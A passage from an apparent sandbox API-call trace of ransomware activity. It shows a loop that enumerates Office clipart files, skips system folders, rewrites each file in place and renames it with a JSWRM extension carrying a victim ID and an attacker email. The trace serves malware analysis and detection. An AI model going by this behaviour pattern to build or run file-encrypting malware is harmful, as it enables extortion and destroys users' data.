returned 5 [0091.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.226] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12770) returned 1 [0091.226] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x31e0) returned 0x24d210 [0091.226] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x31e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x31e0, lpOverlapped=0x0) returned 1 [0091.228] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.228] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x31e0, lpOverlapped=0x0) returned 1 [0091.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.228] CloseHandle (hObject=0x314) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0091.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0091.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0091.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0091.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0091.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0091.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.229] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00646_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0091.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0091.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.230] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="MUSIC_01.MID", cAlternateFileName="")) returned 1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2=".") returned 1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="..") returned 1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="...") returned 1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="windows") returned -1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="recovery") returned -1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="perflogs") returned -1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="documents and settings") returned 1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="system volume information") returned -1 [0091.230] lstrcmpiW (lpString1="MUSIC_01.MID", lpString2="msocache") returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MUSIC_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MUSIC_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MUSIC_01.MID", lpUsedDefaultChar=0x0) returned 12 [0091.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MUSIC_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MUSIC_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MUSIC_01.MID", lpUsedDefaultChar=0x0) returned 12 [0091.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0091.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.231] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6880) returned 1 [0091.231] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ae0) returned 0x205850 [0091.231] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ae0, lpOverlapped=0x0) returned 1 [0091.233] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.233] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ae0, lpOverlapped=0x0) returned 1 [0091.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.233] CloseHandle (hObject=0x314) returned 1 [0091.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0091.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0091.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0091.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0091.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0091.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0091.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.234] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5044, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00042_.WMF", cAlternateFileName="")) returned 1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2=".") returned 1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="..") returned 1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="...") returned 1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="windows") returned -1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="recovery") returned -1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="perflogs") returned -1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="documents and settings") returned 1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="system volume information") returned -1 [0091.234] lstrcmpiW (lpString1="NA00042_.WMF", lpString2="msocache") returned 1 [0091.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00042_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00042_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00042_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00042_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00042_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00042_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0091.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0091.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.236] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20548) returned 1 [0091.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5040) returned 0x24d210 [0091.236] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5040, lpOverlapped=0x0) returned 1 [0091.239] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.239] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5040, lpOverlapped=0x0) returned 1 [0091.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.239] CloseHandle (hObject=0x314) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0091.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0091.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0091.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0091.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0091.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0091.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00042_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00042_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0091.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0091.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0091.240] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a42, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00057_.WMF", cAlternateFileName="")) returned 1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2=".") returned 1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="..") returned 1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="...") returned 1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="windows") returned -1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="recovery") returned -1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="perflogs") returned -1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="documents and settings") returned 1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="system volume information") returned -1 [0091.240] lstrcmpiW (lpString1="NA00057_.WMF", lpString2="msocache") returned 1 [0091.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0091.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00057_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00057_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00057_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0091.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00057_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00057_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00057_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0091.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00057_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10818) returned 1 [0091.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a40) returned 0x24d210 [0091.245] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a40, lpOverlapped=0x0) returned 1 [0091.295] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.295] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a40, lpOverlapped=0x0) returned 1 [0091.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.295] CloseHandle (hObject=0x314) returned 1 [0091.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, 